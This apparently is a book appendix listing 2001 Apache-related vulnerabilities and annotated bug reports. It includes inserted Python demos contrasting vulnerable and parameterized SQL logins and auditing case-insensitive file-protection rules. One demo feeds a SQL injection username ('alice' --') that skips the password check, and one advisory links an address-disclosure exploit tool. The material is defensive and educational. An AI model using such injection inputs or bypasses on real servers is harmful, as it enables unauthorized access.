Description: Giuseppe Tanzilli’s mod_auth_pgsql_sys is an Apache authentication module component for PostgreSQL. (Learn more at http://www.giuseppetanzilli.it/mod_auth_pgsql.) mod_auth_pgsql provides database authentication via PostGRES. Affected versions allow remote attackers to send SQL commands and, in limited circumstances, alter tables.
Fix: Check with the author (or use mod_auth_pgsql 0.9.9 instead).
References: http://cert.uni-stuttgart.de/advisories/Apache_auth.php
mod_auth_pg SQL Vulnerability

Date: August 29, 2001
Apache Report No: N/A
Source: Florian Weimer of RUS-CERT (University of Stuttgart)
Versions: Earlier than 1.3
Description: Min S. Kim’s mod_auth_pg is an Apache authentication module component for PostgreSQL. (Learn more at http://authpg.sourceforge.net/.) mod_auth_pg provides database authentication via PostGRES. Affected versions allow remote attackers to send SQL commands and, in limited circumstances, alter tables.
Fix: Upgrade to AuthPG 1.3.
References: http://cert.uni-stuttgart.de/advisories/Apache_auth.php


auth_mysql SQL Vulnerability 


Date: August 29, 2001
Apache Report No: N/A
Source: Florian Weimer of RUS-CERT (University of Stuttgart)
Versions: mod_auth_mysql 1.9 plus Apache 0.8.11, 0.8.14, 1.0, 1.0.2, 1.0.3, 1.0.5, 1.1, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, and 1.3.20; MySQL 3.22.26, 3.22.27, 3.22.28, 3.22.29, 3.22.30, 3.22.32, 3.23.2, 3.23.3, 3.23.4, 3.23.5, 3.23.8, 3.23.9, 3.23.10, 3.23.23, 3.23.24, 3.23.25, 3.23.26, 3.23.27, 3.23.28, 3.23.29, 3.23.30, 3.23.31, 3.23.34, and 3.23.36
Description: Vivek Khera’s mod_auth_mysql is an Apache authentication module component for MySQL. (Learn more at ftp://ftp.sage-au.org.au/pub/network/www/Apache-msql/.) mod_auth_mysql provides database authentication via MySQL. Affected versions allow remote attackers to send SQL commands and, in limited circumstances, alter tables.
Fix: Upgrade at ftp://ftp.kcilink.com/pub/.
References: http://cert.uni-stuttgart.de/advisories/Apache_auth.php
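The five database-authentication entries above (mod_auth_oracle, mod_auth_pgsql, mod_auth_pgsql_sys, mod_auth_pg and mod_auth_mysql) all share one root cause: the credentials a client supplies are spliced into the SQL text of the lookup query. The following is an added example, not the code of any of those modules; it uses an in-memory SQLite table to put a string-built lookup beside a parameterized one and shows, on a constructed user table, that a single quote in the username changes what the first query asks while the second treats the same input as data. The table layout and the SHA-256 digest are assumptions for illustration only; a real deployment stores a salted, slow password hash.

```python
"""String-built versus parameterized authentication queries.

Added example, not the code of mod_auth_oracle, mod_auth_pgsql,
mod_auth_pgsql_sys, mod_auth_pg or mod_auth_mysql. Uses an in-memory SQLite
table (constructed) to show the class of flaw those entries describe.
"""
import hashlib
import sqlite3


def digest(password):
    """Illustration only: production code needs a salted, slow password hash."""
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db():
    """Constructed user table with one account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pwhash TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("alice", digest("correct horse")))
    db.commit()
    return db


def authenticate_vulnerable(db, user, password):
    """The pattern behind the advisories: the username is pasted into the SQL
    text, so a quote in it ends the literal and the rest becomes SQL."""
    sql = "SELECT name FROM users WHERE name = '%s' AND pwhash = '%s'" % (
        user,
        digest(password),
    )
    return db.execute(sql).fetchone() is not None


def authenticate_safe(db, user, password):
    """Same lookup with bound parameters: the driver sends the username as a
    value, never as SQL text, so its content cannot change the query."""
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND pwhash = ?",
        (user, digest(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = setup_db()
    # Constructed inputs: a correct login, a wrong password, and a username
    # carrying a quote and a comment marker.
    for user, pw in (("alice", "correct horse"), ("alice", "wrong"), ("alice' --", "wrong")):
        print(repr(user), repr(pw),
              "vulnerable:", authenticate_vulnerable(db, user, pw),
              "safe:", authenticate_safe(db, user, pw))
```

The third input is the one to look at: the string-built query accepts it without the password because the comment marker discards the `AND pwhash` clause, and the parameterized query rejects it because no user named `alice' --` exists. Bound parameters are the fix the upgraded modules above apply; an input allowlist on the username is worthwhile defence in depth but not a substitute.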
Apache mod_rewrite Rules Image Link Weakness

Date: August 12, 2001
Apache Report No: N/A
Source: Jeff Workman
Versions: Apache 1.3.14 + EnGarde Secure Linux 1.0.1, Mandrake 7.1, Mandrake 7.2, MandrakeSoft Single Network Firewall 7.2, Apache 1.3.17, MandrakeSoft Corporate Server 1.0.1, Mandrake 8.0, Mandrake 8.0 PPC, OpenBSD 2.8, SuSE Linux 7.1, Apache 1.3.19, Apple Mac OS X 10.0.3, Caldera eDesktop 2.4, Caldera eServer 2.3.1, Caldera OpenLinux 2.4, Debian Linux 2.3, Digital (Compaq) TRU64/DIGITAL UNIX 4.0f, Digital (Compaq) TRU64/DIGITAL UNIX 4.0g, Digital (Compaq) TRU64/DIGITAL UNIX 5.0, FreeBSD 3.5.1, FreeBSD 4.2, hp-UX 10.20, hp-UX 11.0, hp-UX 11.11, Mandrake 7.1, Mandrake 7.2, Mandrake 8.0, Mandrake 8.1, NetBSD 1.5, NetBSD 1.5.1, OpenBSD 2.8, OpenBSD 2.9, Red Hat 6.2, Red Hat 7.0, Red Hat 7.1, SuSE Linux 6.4, SuSE Linux 7.0, SuSE Linux 7.1, SGI IRIX 6.5.8, SGI IRIX 6.5.9, Solaris 7.0, Solaris 8.0, and Apache 1.3.20
Description: Attackers can bypass Rewrite rules and thus access restricted portions of your Web directory hierarchy. In doing so, they can download materials (such as images) and perhaps, by recursive or overzealous download cycles, cause a denial of service attack.
Fix: For Unix and Windows users, write more stringent rewrite rules that provide for directories with large amounts of data therein (such as image directories). For Mac OS X users, Apple released a fix (Apple Hotfix WebSharingUpdate 1.0) located at http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=00733&platform=osx&method=sa/WebSharingUpdate.dmg.bin.
References: http://www.securityfocus.com/archive/1/203955


Apache Network Address Exposure 


Date: August 9, 2001
Apache Report No: N/A
Source: H.D. Moore
Versions: Apache 1.0, 1.2, 1.3 and Windows 2000, NT 4.0
Description: Attackers can use a custom-crafted URL to discover an Apache server’s real network address. To try it—and perhaps automate it across your subnet—get magnum’s disclosure tool from http://downloads.securityfocus.com/vulnerabilities/exploits/disclose.c.
Fix: Disable UseCanonicalName and explicitly set the server’s appropriate name with ServerName. Learn more in Chapter 10, “Apache Network Access Control,” or in Appendix A, “Apache Security-Related Modules and Directives.”
References: http://httpd.Apache.org/docs/mod/core.html#usecanonicalname


Cross-Host-Scripting (Tomcat)

Date: July 2, 2001
Apache Report No: N/A
Source: Hiromitsu Takagi
Versions: Tomcat 3.2.1, BSD/OS 4.0, OpenLinux 2.4, Conectiva 5.1, Debian 2.1,
  Debian 2.2, Digital UNIX 4.0, FreeBSD 4.0, FreeBSD 5.0, HP Secure
  Software for Linux 1.0, Mandrake 7.0, Mandrake 7.1, NetBSD 1.4.1
  x86, NetBSD 1.4.2 x86, Red Hat 6.1 i386, Red Hat 6.2 i386, IRIX 6.4,
  IRIX 6.5, Solaris 7.0, and Solaris 8.0
Description: Embedded scripting in affected versions bypasses filtering, thus
  allowing malicious Webmasters to use third-party scripts from another
  host to breach client security.
Fix: Upgrade
References: http://www.securityfocus.com/archive/1/194464


Mac OS X Client File Protection Bypass

Date: June 10, 2001
Apache Report No: N/A
Source: Stefan Arentz
Versions: Apache 1.3.14Mac, Mac OS X 10.0, Mac OS X 10.0.1, Mac OS X
  10.0.2, Mac OS X 10.0.3
Description: HFS+ is case-insensitive while Apache is not. Using the Mac
  client, attackers can access files normally filtered out by Apache by
  changing their appropriate, case-sensitive names to case-insensitive
  ones. In this way, attackers can bypass file protections. (For example,
  by asking for .HTACCESS instead of .htaccess, they can grab your ACL
  file.)
Fix: This is patched in Mac OS X Server, so you could upgrade to that.
  Otherwise, when you limit file access, do so for lowercase, uppercase,
  and mixed names using regex rules, like this:

    <Files ~ "^\.(ht|HT|Ht|hT)">
        Order allow,deny
        Deny from all
    </Files>

References: http://www.securityfocus.com/archive/1/190036
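An added example (not from the book or from Apache): a small Python audit that emulates the case-sensitive match Apache applies in <Files ~ "regex"> and asks whether a case-insensitive filesystem such as HFS+ leaves an alternate-case request name that the rule does not cover. The rule strings and the DocumentRoot listing are constructed for the demonstration.

```python
"""Check <Files ~ "regex"> protections against a case-insensitive filesystem.

Apache applies the regex case-sensitively, but on HFS+ a request for
".HTACCESS" resolves to the file ".htaccess".  A rule is only effective if
every case spelling that resolves to the file still matches it.
"""
import itertools
import re

# Constructed rules, written as they would appear inside <Files ~ "...">.
CASE_SENSITIVE_RULE = r"^\.ht"             # Apache's traditional default
CASE_FOLDING_RULE = r"^\.(ht|HT|Ht|hT)"    # the hardened form recommended above


def case_variants(name):
    """Yield every upper/lower spelling of `name`.

    Exhaustive (2**letters variants), which is fine for the short names these
    rules protect; a production audit would bound the enumeration.
    """
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in name]
    for combo in itertools.product(*choices):
        yield "".join(combo)


def files_rule_matches(rules, requested):
    """Emulate <Files ~>: a case-sensitive regex search on the requested basename."""
    return any(re.search(rule, requested) for rule in rules)


def find_case_bypass(rules, filename):
    """Return a request spelling that HFS+ maps to `filename` but that none of
    `rules` matches, or None when the rules cover every spelling."""
    for variant in case_variants(filename):
        if not files_rule_matches(rules, variant):
            return variant
    return None


def audit(rules, filenames):
    """Report {protected file: bypassing request name} for files the rules guard
    under their canonical spelling but not under case folding."""
    report = {}
    for fname in filenames:
        if not files_rule_matches(rules, fname):
            continue  # these rules were never meant to protect this file
        bypass = find_case_bypass(rules, fname)
        if bypass is not None:
            report[fname] = bypass
    return report


if __name__ == "__main__":
    # Constructed DocumentRoot listing.
    docroot = [".htaccess", ".htpasswd", "index.html", "logo.gif"]
    for label, rules in (("default", [CASE_SENSITIVE_RULE]),
                         ("hardened", [CASE_FOLDING_RULE])):
        print(label, audit(rules, docroot))
```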


Webmin Environment Variable Disclosure

Date: May 26, 2001
Apache Report No: N/A
Source: J. Nick Koston
Versions: Webmin 0.5x, Webmin 0.6, Webmin 0.7, Webmin 0.8.3 plus OpenLinux
  2.3, OpenLinux 2.4, Corporate Server 1.0.1, Mandrake 7.1, Mandrake
  7.2; Webmin 0.8.4 plus eDesktop 2.4, eServer 2.3.1, OpenLinux
  Desktop 2.3, Mandrake 7.1, Mandrake 7.2; Webmin 0.80 or Webmin
  0.85 plus OpenLinux 2.3, OpenLinux 2.4, Corporate Server 1.0.1,
  Mandrake 7.1, and Mandrake 7.2
Description: Webmin is a management system for Apache servers, written in
  Perl, that enables Web administrators to manage the system (including
  the greater file system's security, which daemons run, and so on). The
  problem is that Webmin's Perl-based CGI reveals your login and password
  in a mime-64-encoded URL. This could easily lead to root compromise.
Fix: All vendors have issued patches. Check the reference URL or contact
  your vendor.
References: http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=solution&id=2795


Apache HTTP Request Denial of Service

Date: April 12, 2001
Apache Report No: N/A
Source: Auriemma Luigi and William A. Rowe, Jr.
Versions: Apache 1.3.12win32 on Microsoft Windows 95, 98, 2000, 2000 SP1,
  2000 SP2, NT 4.0, NT 4.0SP1, and so on
Description: Using a custom-crafted (and short) URL, anyone with a Web browser
  can either hang Apache or run the processor to 100% utilization.
Fix: Upgrade
References: http://www.securityfocus.com/archive/1/176144


JSP Source Disclosure 
Date: April 12, 2001 
Apache Report No: N/A 
Source: Sverre H. Huseby 


Versions: Tomcat 3.2.1 plus BSD/OS 4.0, OpenLinux 2.4, Conectiva 5.1, Debian 
2.1, Debian 2.2, Digital UNIX 4.0, FreeBSD 4.0, FreeBSD 5.0, HP Secure 
Software for Linux 1.0, Mandrake 7.0, Mandrake 7.1, NetBSD 1.4.1 
x86, NetBSD 1.4.2 x86, Red Hat Linux 6.1 i386, Red Hat Linux 6.2 
i386, SGI IRIX 6.4, SGI IRIX 6.5, Solaris 7.0, Solaris 8.0; Tomcat 4.0 plus 
BSD/OS 4.0, OpenLinux 2.4, Conectiva 5.1, Debian 2.1, Debian 2.2, 
Digital UNIX 4.0, FreeBSD 4.0, FreeBSD 5.0, Mandrake 7.0, Mandrake 
7.1, NetBSD 1.4.1 x86, NetBSD 1.4.2 x86, Red Hat Linux 6.1 i386, Red 
Hat Linux 6.2 i386, SGI IRIX 6.4, SGI IRIX 6.5, Solaris 7.0, Solaris 8.0; 
BEA Systems WebLogic Server 5.1; Apache 1.3.9, Apache Group Apache 
1.3.9win32, Apache Group Apache 1.3.12, C2Net StrongHold Web Server 
3.0, HP HP-UX 10.20, HP HP-UX 11.0, IBM AIX 4.2, IBM AIX 4.3, 
Microsoft IIS 4.0, Microsoft IIS 5.0, Microsoft Windows 95, Microsoft 
Windows 98, Microsoft Windows 2000, Microsoft Windows NT 4.0, Red 
Hat Linux 5.1, Solaris 8.0 


Description: Tomcat, when it receives certain malformed URLs, will reveal your JSP 
source. 

Fix: Upgrade 

References: http://www.securityfocus.com/archive/1/176144 


8192 Character Denial-of-Service Attack

Date: April 5, 2001
Apache Report No: 7522
Source: Kaino
Versions: Earlier than 1.3.20 on Win32, WinNT, 2000, OS/2
Description: Attackers could send a string of 8,192 characters to place the
  server in an idle state; sending further strings would produce a bona
  fide crash in some instances.
Fix: Patched in 1.3.20
References: http://bugs.Apache.org/index.cgi/full/7522


Bug Report Structure

Bug reports include the fields enumerated in Table B.1.

TABLE B.1 Fields in Apache Bug Reports

Field           Significance
Number:         The report tracking number
URL:            The full report's network location
Synopsis:       A brief description of the problem
Responsible:    The module or component where the problem is
Class:          Type of bug
Arrival-Date:   The date on which Apache received the report
Closed-Date:    The date on which the Apache team closed the report
Originator:     The human or organization that discovered the bug
Release:        The Apache release that the bug affects
Environment:    The environment in which the bug operates
Description:    An extended discussion on the issue
Number: 7028
URL: http://bugs.Apache.org/index.cgi/full/7028
Synopsis: Apache server doesn't start
Responsible: Apache
Arrival Date: Thu Jan 04 06:00:01 PST 2001
Closed Date: Wed Mar 21 22:43:32 PST 2001
Originator: ddubrann@capgemini.fr
Release: 1.3.14
Environment: A simple Win95 PC station
Description: This bug produces the error setup_inherited_listeners: WSASocket
  failed to open the inherited socket. Likely causes are a) you're using
  outdated DLLs, including wsock32.dll, ws2help.dll, and ws2_32.dll; or
  b) you're using VPN software (Aventail is one candidate). The most
  likely issue, however, is an outdated Winsock distribution (and this
  also affects 1.3.9). Upgrade.

Number: 7041
URL: http://bugs.Apache.org/index.cgi/full/7041
Synopsis: CGI scripts won't always run
Responsible: Apache
Arrival Date: Sun Jan 07 15:50:00 PST 2001
Closed Date: Thu Feb 15 13:38:43 PST 2001
Originator: rmstewar@ix.netcom.com
Release: 1.3.14
Environment: Windows 95
Description: CGI scripts, compiled COM and EXE files, C programs, Fortran
  programs, and even DOS batch files run from a prompt but won't execute
  through a client request. The problem is limited to 1.3.14 and arises
  because pipes that handle CGI streams neither open nor close correctly.
  The solution is to upgrade.

Number: 7042
URL: http://bugs.Apache.org/index.cgi/full/7042
Synopsis: Apache is freezing, not responding
Responsible: Apache
Arrival Date: Mon Jan 08 11:10:00 PST 2001
Closed Date: Tue Jan 23 13:28:37 PST 2001
Originator: sr@is24.de
Release: 1.3.12
Environment: Dual PII 450 MHz + SCSI on WinNT4.0 SP6A


Description: This bug produces the following entry in error_log: [notice]
  jrApache[1023] [1156] dropped. At that point, Apache dies. This is not
  attributable to core Apache but is a problem with JRun. JRun is a server
  extension that enables ISAPI-enabled servers to execute Java servlets.
  If you don't fancy Perl, C, C++, PHP, COBOLScript, or other scripting
  languages to facilitate CGI, and Java is your thing, try JRun. Find it
  at http://www.macromedia.com/software/jrun/.

Number: 7062
URL: http://bugs.Apache.org/index.cgi/full/7062
Synopsis: JSP technical problem with Apache 1.3
Responsible: Apache
Arrival Date: Sat Jan 13 01:50:00 PST 2001
Closed Date: Mon Jan 15 18:01:34 PST 2001
Originator: diemln@fpt.com.vn
Release: 1.3
Environment: Linux Mandrake 7.0, Kernel 2.2.15-4mdk
Description: The originator wanted to run JSP on his Mandrake server without
  using Tomcat. Apache authorities explained that Mandrake's Apache is
  highly customized and supports many functions that are not standards
  compliant. Hence, the Apache folks couldn't help out. If you encounter
  this problem, contact Mandrake.

Number: 7063
URL: http://bugs.Apache.org/index.cgi/full/7063
Synopsis: mod_auth_digest BAD_REQUEST
Responsible: Apache
Arrival Date: Sat Jan 13 10:00:00 PST 2001
Closed Date: Unspecified
Originator: mdyla@elb2.pl
Release: 1.3.14
Environment: Linux Slackware
Description: This bug manifests itself when a query string appears in the URI
  (with JSP, for example) and mod_auth_digest chokes, reporting a bad
  request. (To learn more about mod_auth_digest, see Appendix A or
  Chapter 13.) Reportedly, the fix is to disable query comparison support
  in authenticate_digest_user.

Number: 7069
URL: http://bugs.Apache.org/index.cgi/full/7069
Synopsis: Cannot upload binaries to the server
Responsible: Apache
Arrival Date: Mon Jan 15 02:30:00 PST 2001
Closed Date: Unspecified
Originator: weetat@cesma.com.sg
Release: 1.3.14
Environment: Linux 6.1, JDK 1.2.2, IE 5.0, Netscape 4.1
Description: This isn't an Apache bug. The originator designed Java servlets
  that included file upload capability. The applications would upload only
  text files. If you encounter the same problem, contact this fellow. He
  doubtless solved it on his own.

Number: 7077
URL: http://bugs.Apache.org/index.cgi/full/7077
Synopsis: byteserving
Responsible: Apache
Arrival Date: Tue Jan 16 10:00:00 PST 2001
Closed Date: Unspecified
Originator: rv33100@GlaxoWellcome.co.uk
Release: 1.3.14
Environment: Sun Solaris 2.7 and gcc
Description: This bug arises when a client loads a PDF file inline and PDF
  background processing is enabled. It is restricted to Acrobat 4.0 in
  conjunction with Netscape 4.x or IE 4.x and 5.x. This problem, which
  Tony Finch corrected, stemmed from http_protocol.c. The patch for the
  byte ranging problem—an issue on 1.3.14—is at
  http://Apache.org/~fanf/http_protocol.patch.fanf.


Number: 7092
URL: http://bugs.Apache.org/index.cgi/full/7092
Synopsis: HTTP stops serving pages
Responsible: Apache
Arrival Date: Thu Jan 18 02:20:01 PST 2001
Closed Date: Unspecified
Originator: pm@seascopegroup.com
Release: 1.3.6
Environment: AIX
Description: This bug, which apparently hasn't yet been addressed, echoes a
  ws_read_domain_link error to error_log. Reportedly, this error jams all
  running instances of HTTPD, resulting in resource starvation.
  Unfortunately, one can only recover by restarting HTTPD, but it still
  returns to its former behavior. So far as I can tell, no fix is
  forthcoming or, if so, it hasn't been recorded. If you're having this
  problem, check with the originator.

Number: 7096
URL: http://bugs.Apache.org/index.cgi/full/7096
Synopsis: Not secure enough
Responsible: Apache
Arrival Date: Thu Jan 18 13:20:02 PST 2001
Closed Date: Thu Jan 18 15:35:12 PST 2001
Originator: steeven@kali.com.cn
Release: All
Environment: Linux 2.16, Apache 1.3.14
Description: The originator was concerned about security of scripts run out
  of /cgi-bin/, and its UID/GID. Apache personnel responded by directing
  the originator to a document that every Apache administrator should
  read: http://httpd.Apache.org/docs/suexec.html. The suEXEC feature—
  introduced in Apache 1.2—provides Apache users the ability to run CGI
  and SSI programs under user IDs different from the user ID of the
  calling Web server. This solves the problem of crackers exploiting the
  Web server's permissions.
Number: 7129
URL: http://bugs.Apache.org/index.cgi/full/7129
Synopsis: CGI support under Network is not working
Responsible: Apache
Arrival Date: Thu Jan 25 05:20:00 PST 2001
Closed Date: Unknown
Originator: christian@hofstaedtler.com
Release: 1.3.14
Environment: Novell NetWare 5.1 SP1, precompiled binaries
Description: Reportedly, mod_cgi isn't compiled into prebuilt binaries for
  Novell under 1.3.14. Your options are to build from a source
  distribution or upgrade.

Number: 7138
URL: http://bugs.Apache.org/index.cgi/full/7138
Synopsis: Floating Point Exception
Responsible: Apache
Arrival Date: Sat Jan 27 13:40:00 PST 2001
Closed Date: Sat Jan 27 18:06:14 PST 2001
Originator: goro@phps.com.ar
Release: 1.3.14
Environment: Linux 2.0.34 on a cobalt raq2 mips
Description: This isn't an Apache problem. The originator explained that
  previous Apache installations worked but that when he installed PHP,
  the floating-point error appeared. Jason Nugent from stomped.com
  explained the glitch: The PHP 4.0.4 ./configure script doesn't properly
  detect the SRAND48 function. In 4.0.4 (and perhaps earlier versions),
  edit main/php_config.h and set SRAND48's definition to
  #define SRAND48 0 rather than #define SRAND48 1—even though PHP's
  authors say "Generated automatically from configure.in by autoheader"
  and "Leave this file alone." You'll find that definition on lines 396
  and 397 of php_config.h (at least on the one dated September 22, 2000,
  with an MD5 sig of 3e481210d84c9e40556af30d4dfab6a8).


The Critical Listings 527

Number: 7144
URL: http://bugs.Apache.org/index.cgi/full/7144
Synopsis: Problem with link.exe compiling with NMAKE
Responsible: Apache
Arrival Date: Sun Jan 28 14:50:01 PST 2001
Closed Date: Unspecified
Originator: kia_dabirian@yahoo.com
Release: 1.3.14
Environment: win2000, nmake, VC++
Description: This bug entails a fatal error when building htdigest.exe with
  nmake and VC++. Apache personnel haven't dealt with this, chiefly
  because it's not an Apache issue. Rather, users trying such a build must
  first fix their project settings for the C++ runtime and plug in
  Multithreaded DLL debugging. The most common cause of this error is
  accidentally linking with both the single-threaded and multithreaded
  libraries. Ensure that the application project file includes only the
  appropriate libraries and that any third-party libraries have
  appropriately created single-threaded or multithreaded versions. See
  MSDN's VC++ Documentation Library entries on Linker Tools Error LNK1169
  and Linker Tools Error LNK2005. Note that the /FORCE or /FORCE:MULTIPLE
  options also override this error (and thus, succeeding errors), but in
  this instance, don't use them. With a utility as important as
  htdigest.exe, do it right. htdigest.exe handles your digest-based user
  authentication, which is not something you want to approximate.

Number: 7152
URL: http://bugs.Apache.org/index.cgi/full/7152
Synopsis: Apache processes halt after heavy traffic
Responsible: Apache
Arrival Date: Mon Jan 29 10:50:03 PST 2001
Closed Date: Unspecified
Originator: assi_st@yahoo.com
Release: 1.3.12
Environment: Linux 2.2.16 i686 unknown
Description: This bug is recondite and is reproducible only in certain
  situations. The originator established a reverse proxy system whereby
  the proxy receives client requests and redirects these to a server.
  Heavy traffic causes HTTPD processes to hang and you can recover only by
  restarting HTTPD cold. The Apache team produced no fix for this, nor am
  I sure that one exists. Essentially, the originator (or anyone, for that
  matter) should rethink this configuration. Otherwise, they might invite
  denial-of-service or resource starvation attacks.

Number: 7153
URL: http://bugs.Apache.org/index.cgi/full/7153
Synopsis: Problem with blank in URL on Netscape
Responsible: Apache
Arrival Date: Mon Jan 29 17:20:00 PST 2001
Closed Date: Mon Jan 29 19:04:33 PST 2001
Originator: ggvs@free.fr
Release: 1.3.14
Environment: Win98
Description: This bug report raises a valid question that many Windows users
  ask. The originator had directories and files that contained whitespace
  gaps in their names. When Netscape called these URLs, Apache would reply
  that the requested resources could not be found. There are two things
  to keep in mind: First, as explained in Apache's reply, "Unencoded
  spaces are not permitted in URLs. Allowing URLs with spaces would cause
  serious problems in HTTP. Some browsers may clean these up for you
  before sending (by hex-encoding them), but in general, you should not
  expect them to work." Second, when pointing to such a URL (and such URLs
  are a terrible idea) you can reach it by using the %20 character
  sequence, which simulates a blank space wherever needed, as the filler.
  However, don't break filenames with spaces. Few users know to use hex
  encoding and most browsers don't help.

Number: 7158
URL: http://bugs.Apache.org/index.cgi/full/7158
Synopsis: Rewrite map doesn't work anymore
Responsible: Apache


Arrival Date: Tue Jan 30 11:10:03 PST 2001
Closed Date: Thu Feb 01 01:16:59 PST 2001
Originator: cholet@logilune.com
Release: 1.3.17
Environment: FreeBSD 2.2.7-RELEASE
Description: This bug in RewriteMap handling in Apache 1.3.17 causes ${}
  expansions to be ignored. It's a problem in mod_rewrite.c and there is a
  fix. However, the link to the fix Apache provides in its bug database no
  longer works. Try
  http://bigfoot.eecs.umich.edu/pub/NetBSD/packages/distfiles/Apache_1.3.17-fix.diff
  instead.

Number: 7159
URL: http://bugs.Apache.org/index.cgi/full/7159
Synopsis: Solaris bug that causes HTTPD to hang in sleeping state
Responsible: Apache
Arrival Date: Tue Jan 30 11:30:03 PST 2001
Originator: rmeyer@befree.com
Release: 1.3.12
Environment: SunOS devfe01 5.6 Generic Ultra-2 sun4
Description: This bug, the originator felt, was based in Solaris, but he
  thought he might have better luck with Apache personnel. This fellow's
  reporting of the bug was so incredibly precise (he included full output
  from gdb, and compilation notes nested in his browser's HTML) that tech
  support people might have distributed it as a joke. Unfortunately, it
  was no joke. At any rate, after pages and pages (and likely, much effort
  on the originator's part), the bottom line was this: "Sorry for the
  mixup, but you can close this problem. It turned out to be a problem
  with the script that Oracle had provided to link in their OCI
  libraries." I can sympathize with the originator. OCI is my least
  favorite Web-to-database technology. Try it with C (after running your
  stuff through ProC) or PHP sometime. It's not a pretty sight.

Number: 7173
URL: http://bugs.Apache.org/index.cgi/full/7173
Synopsis: installation problem when executing Apache.exe
Responsible: Apache
Arrival Date: Wed Jan 31 21:10:00 PST 2001
Closed Date: Sat Feb 03 16:46:54 PST 2001
Originator: arachne@pacbell.net
Release: 1.3
Environment: Win98
Description: The originator purchased Julie Meloni's PHP Fast & Easy Web
  Development (ISBN: 076153055X), which ships with Apache, among other
  things. He installed Apache and tried to run it. He then encountered
  Can not determine host name. This is not a bug. Try
  ServerName IP-Address.

Number: 7177
URL: http://bugs.Apache.org/index.cgi/full/7177
Synopsis: A bad httpd.conf in the distribution (for which you must set your
  ServerName value).
Responsible: Apache
Arrival Date: Fri Feb 02 02:50:00 PST 2001
Closed Date: Unspecified
Originator: cbrown@reflexe.fr
Release: 1.3.17
Environment: Windows NT4, Apache 1.3.17 winbinaries
Description: The originator mistakenly thought that the Win32 distribution
  contained Unix-only and Unix-centric files. It doesn't. See the
  mod_so.html docs. The Windows binary distribution works.

Number: 7179
URL: http://bugs.Apache.org/index.cgi/full/7179
Synopsis: Server does not respond and logs (in httpd_errors): [error]
  (9)Bad file number: accept: (client socket)
Responsible: Apache
Arrival Date: Fri Feb 02 07:30:02 PST 2001
Closed Date: Unspecified
Originator: salvo.ciccia@st.com


Release: Server version: Apache 1.3.12 (Unix)
Environment: HP-UX ctcsf01 B.11.00 U 9000/800
Description: This is likely a C socket or I/O error (see
  http://www.cisco.com/univercd/cc/td/doc/product/software/ioss390/ios390mu/mucsock.htm
  for codes). It also occurs on OS2SEM, Tru64, Ingres, Oracle for Unix,
  and occasionally on Windows (even with other network applications, such
  as qpopper). The Apache team felt that the problem was rooted in
  blocking. Perhaps. Ensure that your TCP/IP is correctly configured.

Number: 7184
URL: http://bugs.Apache.org/index.cgi/full/7184
Synopsis: File http://httpd.Apache.org/dist/binaries/win32/old/Apache_1_3_6_win32.exe
  is corrupted.
Responsible: Apache
Arrival Date: Sat Feb 03 06:40:00 PST 2001
Closed Date: Sat Feb 03 16:32:04 PST 2001
Originator: pobuda@operamail.com
Release: 1.3.6
Environment: Unspecified
Description: The Apache team reportedly no longer supports the 1.3.6
  installer. Upgrade.

Number: 7186
URL: http://bugs.Apache.org/index.cgi/full/7186
Synopsis: Make fails
Responsible: Apache
Arrival Date: Sat Feb 03 14:30:00 PST 2001
Closed Date: Mon Feb 05 13:16:40 PST 2001
Originator: gilles.retiere@free.fr
Release: 1.3.14
Environment: Linux 2.2.14 with gcc 2.95.2
Description: The Apache team passed on this one, as the originator was trying
  unsuccessfully to compile in MySQL and php-3.0.18. Because the
  Apache/MySQL/PHP combination is popular, I hunted down the problem. In
  such a build, be sure to specify the -lmysqlclient option.

Number: 7193
URL: http://bugs.Apache.org/index.cgi/full/7193
Synopsis: MultiViews causes script dump
Responsible: Apache
Arrival Date: Mon Feb 05 06:40:01 PST 2001
Closed Date: Unspecified
Originator: jerry@nitroweb.net
Release: 1.3.14
Environment: FreeBSD 4.2-STABLE
Description: Here, the originator tried to access his CGI scripts in a URL
  without specifying their extensions (for instance, /latest-news instead
  of /latest-news.cgi). When he ran such scripts with their full name
  (latest-news.cgi), they worked fine. However, when he called them
  without their extension (latest-news), Apache returned script source
  instead. The official response was to remove MultiViews from Options.

Number: 7231
URL: http://bugs.Apache.org/index.cgi/full/7231
Synopsis: Apache .msi installer reports error 2735
Responsible: Apache
Arrival Date: Sun Feb 11 18:30:00 PST 2001
Closed Date: Mon Feb 12 15:41:20 PST 2001
Originator: next.99@xtra.co.nz
Release: 1.3.17-win32-src.msi
Environment: Windows 95, Windows Installer V 1.20
Description: This happens when you haven't yet installed Winsock or have an
  out-of-date version. Install or upgrade Winsock and if you're not
  running a LAN (that is, if you use a modem to connect), connect to the
  Net and try again.


Number: 7241
URL: http://bugs.Apache.org/index.cgi/full/7241
Synopsis: Binary download does not work
Responsible: Apache
Arrival Date: Tue Feb 13 12:10:00 PST 2001
Closed Date: Wed Oct 17 10:56:04 PDT 2001
Originator: jbeau@us.ibm.com
Release: 1.3.17
Environment: AIX 4.3.2
Description: 1.3.17 had several problems on AIX. The solution is to upgrade.

Number: 7242
URL: http://bugs.Apache.org/index.cgi/full/7242
Synopsis: file /usr/lib/libthread.so.1: symbol _libc_tsd_common: referenced
  symbol not found
Responsible: Apache
Arrival Date: Tue Feb 13 17:50:00 PST 2001
Closed Date: Unspecified
Originator: tymat@setec.org
Release: 1.3.14
Environment: Solaris 7, gcc 2.8.1
Description: A rare problem with /usr/lib/libthread.so.1 during make. I found
  no evidence of a fix or further discussion. Hence, I assume it was
  specific to the originator's machine.

Number: 7246
URL: http://bugs.Apache.org/index.cgi/full/7246
Synopsis: Apache dies with PHP + SSL
Responsible: Apache
Arrival Date: Wed Feb 14 07:50:01 PST 2001
Closed Date: Wed Feb 14 20:08:29 PST 2001
Originator: carsten_burghardt@ibexnet.de
Release: 1.3.17
Environment: Linux RH 6.0, egcs-2.91.66
Description: The originator found that when he compiled in both PHP and SSL,
  Apache wouldn't run both but would run either alone without event.
